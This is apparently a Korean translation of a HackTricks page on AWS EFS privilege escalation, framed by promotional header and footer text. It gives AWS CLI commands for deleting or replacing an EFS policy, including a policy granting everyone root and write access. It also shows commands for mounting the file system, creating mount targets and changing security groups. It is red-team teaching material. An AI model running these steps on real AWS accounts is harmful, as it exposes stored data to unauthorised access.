AWS - EFS Privesc

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!
공식 PEASS & HackTricks 상품을 구매하세요.
The PEASS Family를 발견하세요. 독점적인 NFTs 컬렉션입니다.
💬 Discord 그룹 또는 telegram 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
HackTricks와 HackTricks Cloud github 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.

EFS

EFS에 대한 추가 정보는 다음에서 확인할 수 있습니다:

EFS를 마운트하려면 EFS가 노출된 하위 네트워크에 있어야하며 액세스 권한(보안 그룹)이 있어야합니다. 이렇게 되면 기본적으로 항상 마운트 할 수 있지만, IAM 정책으로 보호되는 경우 여기에서 언급된 추가 권한이 필요합니다.

`elasticfilesystem:DeleteFileSystemPolicy`|`elasticfilesystem:PutFileSystemPolicy`

위 권한 중 하나를 가지고 있으면 공격자는 파일 시스템 정책을 변경하여 액세스 권한을 부여하거나 삭제하여 기본 액세스를 허용할 수 있습니다.

정책을 삭제하려면:

aws efs delete-file-system-policy \
--file-system-id <value>

변경하려면:

aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/policy.json

// Give everyone trying to mount it read, write and root access
// policy.json:
{
"Version": "2012-10-17",
"Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
"Statement": [
{
"Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"elasticfilesystem:ClientRootAccess",
"elasticfilesystem:ClientWrite",
"elasticfilesystem:ClientMount"
],
"Condition": {
"Bool": {
"elasticfilesystem:AccessedViaMountTarget": "true"
}
}
}
]
}

`elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)`

이 권한을 가지고 있는 공격자는 EFS를 마운트할 수 있습니다. EFS를 마운트할 수 있는 모든 사용자에게 기본적으로 쓰기 권한이 주어지지 않은 경우, 그는 읽기 권한만 가지게 될 것입니다.

sudo mkdir /efs
sudo mount -t efs -o tls,iam  <file-system-id/EFS DNS name>:/ /efs/

추가 권한 elasticfilesystem:ClientRootAccess와 elasticfilesystem:ClientWrite는 파일 시스템이 마운트된 후에 해당 파일 시스템에 쓰기하고 루트로 액세스할 수 있습니다.

잠재적인 영향: 파일 시스템에서 민감한 정보를 찾아 간접적인 권한 상승이 가능합니다.

`elasticfilesystem:CreateMountTarget`

EFS의 마운트 타겟이 없는 서브넷에 공격자가 위치한 경우, 이 권한을 사용하여 자신의 서브넷에 마운트 타겟을 생성할 수 있습니다.

# You need to indicate security groups that will grant the user access to port 2049
aws efs create-mount-target --file-system-id <fs-id> \
--subnet-id <value> \
--security-groups <value>

잠재적 영향: 파일 시스템에서 민감한 정보를 찾아 간접적으로 권한 상승을 할 수 있습니다.

`elasticfilesystem:ModifyMountTargetSecurityGroups`

공격자가 EFS에 자신의 서브넷에 마운트 타겟이 있지만 트래픽을 허용하는 보안 그룹이 없는 상황에서, 그는 선택한 보안 그룹을 수정하여 트래픽을 허용하도록 변경할 수 있습니다:

aws efs modify-mount-target-security-groups \
--mount-target-id <value> \
--security-groups <value>

잠재적 영향: 파일 시스템에서 민감한 정보를 찾아 간접적인 권한 상승이 가능합니다.

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!
공식 PEASS & HackTricks 상품을 구매하세요.
The PEASS Family를 발견하세요. 독점적인 NFTs 컬렉션입니다.
💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
HackTricks와 HackTricks Cloud github 저장소에 PR을 제출하여 여러분의 해킹 기법을 공유하세요.

前へAWS - ECS Privesc 次へAWS - Elastic Beanstalk Privesc

最終更新 2 か月前